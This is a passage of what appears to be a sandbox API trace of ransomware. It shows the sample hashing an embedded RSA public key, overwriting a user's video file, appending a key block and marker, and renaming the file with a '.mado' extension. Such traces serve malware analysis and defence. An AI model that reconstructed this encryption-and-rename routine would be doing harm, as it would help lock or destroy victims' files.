nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39cfb70, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb70*=0x13d82, lpOverlapped=0x0) returned 1 [0204.884] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0204.885] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1da) returned 0x3310808 [0204.885] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0204.885] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0204.885] CryptAcquireContextW (in: phProv=0x39cfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39cfa50*=0x321b78) returned 1 [0204.885] CryptCreateHash (in: hProv=0x321b78, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39cfa58 | out: phHash=0x39cfa58) returned 1 [0204.885] CryptHashData (hHash=0x32ef238, pbData=0x3310808, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0204.886] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x0, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39cfa54) returned 1 [0204.886] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x32b3720 [0204.886] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x32b3720, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x32b3720, pdwDataLen=0x39cfa54) returned 1 [0204.886] GetLastError () returned 0x0 [0204.886] CryptDestroyHash (hHash=0x32ef238) returned 1 [0204.886] CryptReleaseContext (hProv=0x321b78, dwFlags=0x0) returned 1 [0204.886] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3310808 | out: hHeap=0x2c0000) returned 1 [0204.886] UuidCreate (in: Uuid=0x39cfa48 | out: Uuid=0x39cfa48) returned 0x0 [0204.886] UuidToStringA (in: Uuid=0x39cfa48, StringUuid=0x39cfa40 | out: StringUuid=0x39cfa40) returned 0x0 [0204.886] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0170 [0204.886] RpcStringFreeA (in: String=0x39cfa40 | out: String=0x39cfa40) returned 0x0 [0204.886] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0204.886] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c01e0 [0204.886] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x13d80) returned 0x3b81690 [0204.886] SetFilePointer (in: hFile=0x63c, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0204.886] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0170 | out: hHeap=0x2c0000) returned 1 [0204.886] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1e0) returned 0x3310808 [0204.886] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0170 [0204.886] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1e0) returned 0x32eb20 [0204.887] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x32e5198 [0204.887] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3b80ed0 [0204.887] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe4f0 [0204.887] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3b80f18 [0204.887] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe508 [0204.887] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe538 [0204.887] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe580 [0204.887] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe550 [0204.887] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x32f7e58 [0204.887] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x3b6bb80 [0204.887] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x3b6bb80, Size=0x218) returned 0x3b7c6a8 [0204.887] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x3b74e80 [0204.887] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe538 | out: hHeap=0x2c0000) returned 1 [0204.887] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe550 | out: hHeap=0x2c0000) returned 1 [0204.887] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe580 | out: hHeap=0x2c0000) returned 1 [0204.887] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f7e58 | out: hHeap=0x2c0000) returned 1 [0204.887] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74e80 | out: hHeap=0x2c0000) returned 1 [0204.887] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe580 [0204.887] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x3277198 [0204.887] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x32fe550 [0204.887] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x32b36c0 [0204.887] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x32fe538 [0204.887] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x3277188 [0204.887] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x3b6eb80 [0204.887] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9250 [0204.887] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x32e51f8 [0204.887] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b3720 [0204.887] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x3b6ec98 [0204.888] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36e0 [0204.888] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771a8 [0204.888] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6eb80 | out: hHeap=0x2c0000) returned 1 [0204.888] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe550 | out: hHeap=0x2c0000) returned 1 [0204.888] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277188 | out: hHeap=0x2c0000) returned 1 [0204.888] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe538 | out: hHeap=0x2c0000) returned 1 [0204.888] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36c0 | out: hHeap=0x2c0000) returned 1 [0204.888] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277198 | out: hHeap=0x2c0000) returned 1 [0204.888] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe580 | out: hHeap=0x2c0000) returned 1 [0204.888] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9250 | out: hHeap=0x2c0000) returned 1 [0204.888] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32e5198 | out: hHeap=0x2c0000) returned 1 [0204.888] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7c6a8 | out: hHeap=0x2c0000) returned 1 [0204.888] GetCurrentThreadId () returned 0x600 [0204.888] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b72b80 [0204.888] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x3b72950 [0204.888] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x32c0218 [0204.888] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321b78 [0204.888] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x336fe98 [0204.888] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277198 [0204.888] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277188 [0204.888] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b72c88 [0204.888] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0204.888] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0204.888] GetCurrentThreadId () returned 0x600 [0204.888] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0204.888] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0204.888] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x32b69d8 [0204.888] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0204.888] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0204.888] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0204.889] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0204.889] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b69d8 | out: hHeap=0x2c0000) returned 1 [0204.889] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b72d90 [0204.889] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277198 | out: hHeap=0x2c0000) returned 1 [0204.889] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x32c3a48 [0204.889] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277198 [0204.889] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b72e98 [0204.889] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0204.889] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe580 [0204.889] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0204.889] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0204.889] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x31b9e0 [0204.889] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x31b9f0 [0204.889] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b780 [0204.889] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b790 [0204.889] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7a0 [0204.889] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7b0 [0204.889] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe538 [0204.889] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9e0 | out: hHeap=0x2c0000) returned 1 [0204.889] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x31b9e0 [0204.889] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0204.889] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0204.889] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7c0 [0204.889] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7d0 [0204.889] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7e0 [0204.889] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe550 [0204.889] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7d0 | out: hHeap=0x2c0000) returned 1 [0204.889] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36c0 [0204.889] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7c0 | out: hHeap=0x2c0000) returned 1 [0204.889] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe520 [0204.890] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7e0 | out: hHeap=0x2c0000) returned 1 [0204.890] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe598 [0204.890] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0204.890] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x32771c8 [0204.890] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7a0 | out: hHeap=0x2c0000) returned 1 [0204.890] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe568 [0204.890] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0204.890] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe5b0 [0204.890] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f0 | out: hHeap=0x2c0000) returned 1 [0204.890] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x31b9f0 [0204.890] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277198 | out: hHeap=0x2c0000) returned 1 [0204.890] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36a0 [0204.890] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f0 | out: hHeap=0x2c0000) returned 1 [0204.890] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x32b37c0 [0204.890] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe538 | out: hHeap=0x2c0000) returned 1 [0204.890] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe538 [0204.890] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9e0 | out: hHeap=0x2c0000) returned 1 [0204.890] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x3b7c6a8 [0204.890] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe580 | out: hHeap=0x2c0000) returned 1 [0204.890] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x3b6eb80 [0204.890] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe5b0 | out: hHeap=0x2c0000) returned 1 [0204.890] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x3b74e80 [0204.890] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b37c0 | out: hHeap=0x2c0000) returned 1 [0204.890] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x3b6edb0 [0204.890] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b780 | out: hHeap=0x2c0000) returned 1 [0204.890] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x3b6eec8 [0204.890] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe538 | out: hHeap=0x2c0000) returned 1 [0204.890] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x3b75098 [0204.891] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6eb80 | out: hHeap=0x2c0000) returned 1 [0204.891] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b72fa0 [0204.891] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277188 | out: hHeap=0x2c0000) returned 1 [0204.891] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321b78 | out: hHeap=0x2c0000) returned 1 [0204.891] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b72d90 | out: hHeap=0x2c0000) returned 1 [0204.891] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b72fa0 | out: hHeap=0x2c0000) returned 1 [0204.891] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36a0 | out: hHeap=0x2c0000) returned 1 [0204.891] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6eec8 | out: hHeap=0x2c0000) returned 1 [0204.891] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74e80 | out: hHeap=0x2c0000) returned 1 [0204.891] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b75098 | out: hHeap=0x2c0000) returned 1 [0204.891] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6edb0 | out: hHeap=0x2c0000) returned 1 [0204.891] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b790 | out: hHeap=0x2c0000) returned 1 [0204.891] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe568 | out: hHeap=0x2c0000) returned 1 [0204.891] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7b0 | out: hHeap=0x2c0000) returned 1 [0204.891] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe598 | out: hHeap=0x2c0000) returned 1 [0204.891] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36c0 | out: hHeap=0x2c0000) returned 1 [0204.891] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe550 | out: hHeap=0x2c0000) returned 1 [0204.891] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe520 | out: hHeap=0x2c0000) returned 1 [0204.891] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x336fe98 | out: hHeap=0x2c0000) returned 1 [0204.891] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0218 | out: hHeap=0x2c0000) returned 1 [0204.891] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b72c88 | out: hHeap=0x2c0000) returned 1 [0204.891] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe508 | out: hHeap=0x2c0000) returned 1 [0204.891] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b80f18 | out: hHeap=0x2c0000) returned 1 [0204.891] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7c6a8 | out: hHeap=0x2c0000) returned 1 [0204.891] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b72e98 | out: hHeap=0x2c0000) returned 1 [0204.891] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c3a48 | out: hHeap=0x2c0000) returned 1 [0204.892] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6ec98 | out: hHeap=0x2c0000) returned 1 [0204.892] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b3720 | out: hHeap=0x2c0000) returned 1 [0204.892] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771a8 | out: hHeap=0x2c0000) returned 1 [0204.892] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36e0 | out: hHeap=0x2c0000) returned 1 [0204.892] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32e51f8 | out: hHeap=0x2c0000) returned 1 [0204.892] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32eb20 | out: hHeap=0x2c0000) returned 1 [0204.892] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0170 | out: hHeap=0x2c0000) returned 1 [0204.892] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3310808 | out: hHeap=0x2c0000) returned 1 [0204.892] WriteFile (in: hFile=0x63c, lpBuffer=0x3b81690*, nNumberOfBytesToWrite=0x13d7d, lpNumberOfBytesWritten=0x39cfb14, lpOverlapped=0x0 | out: lpBuffer=0x3b81690*, lpNumberOfBytesWritten=0x39cfb14*=0x13d7d, lpOverlapped=0x0) returned 1 [0204.892] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b81690 | out: hHeap=0x2c0000) returned 1 [0204.892] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x13d82, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0204.892] WriteFile (in: hFile=0x63c, lpBuffer=0x3b72b80*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b72b80*, lpNumberOfBytesWritten=0x39cfb50*=0x100, lpOverlapped=0x0) returned 1 [0204.892] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b72b80 | out: hHeap=0x2c0000) returned 1 [0204.892] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x32ff330 [0204.892] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x3b74e80 [0204.892] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="8TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1", cchWideChar=-1, lpMultiByteStr=0x3b74e80, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="8TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1", lpUsedDefaultChar=0x0) returned 41 [0204.892] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x3b752b0 [0204.893] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74e80 | out: hHeap=0x2c0000) returned 1 [0204.893] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32ff330 | out: hHeap=0x2c0000) returned 1 [0204.893] WriteFile (in: hFile=0x63c, lpBuffer=0x3b752b0*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b752b0*, lpNumberOfBytesWritten=0x39cfb50*=0x28, lpOverlapped=0x0) returned 1 [0204.893] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b752b0 | out: hHeap=0x2c0000) returned 1 [0204.893] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0204.893] WriteFile (in: hFile=0x63c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39cfb50*=0x26, lpOverlapped=0x0) returned 1 [0204.893] CloseHandle (hObject=0x63c) returned 1 [0204.894] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x32ff330 [0204.894] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x870) returned 0x3b74e80 [0204.894] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32ff330 | out: hHeap=0x2c0000) returned 1 [0204.894] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\TR2H0s.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\tr2h0s.mkv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\TR2H0s.mkv.mado" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\tr2h0s.mkv.mado")) returned 1 [0204.895] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74e80 | out: hHeap=0x2c0000) returned 1 [0204.895] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0204.895] VirtualFree (lpAddress=0x3d10000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.896] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x326020 | out: hHeap=0x2c0000) returned 1 [0204.896] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x601b92e0, ftCreationTime.dwHighDateTime=0x1d5e6d5, ftLastAccessTime.dwLowDateTime=0xa3de5fe0, ftLastAccessTime.dwHighDateTime=0x1d5e774, ftLastWriteTime.dwLowDateTime=0xa3de5fe0, ftLastWriteTime.dwHighDateTime=0x1d5e774, nFileSizeHigh=0x0, nFileSizeLow=0x13d82, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TR2H0s.mkv", cAlternateFileName="")) returned 0 [0204.896] FindClose (in: hFindFile=0x32ef1f8 | out: hFindFile=0x32ef1f8) returned 1 [0204.896] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0100 | out: hHeap=0x2c0000) returned 1 [0204.896] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c3578 | out: 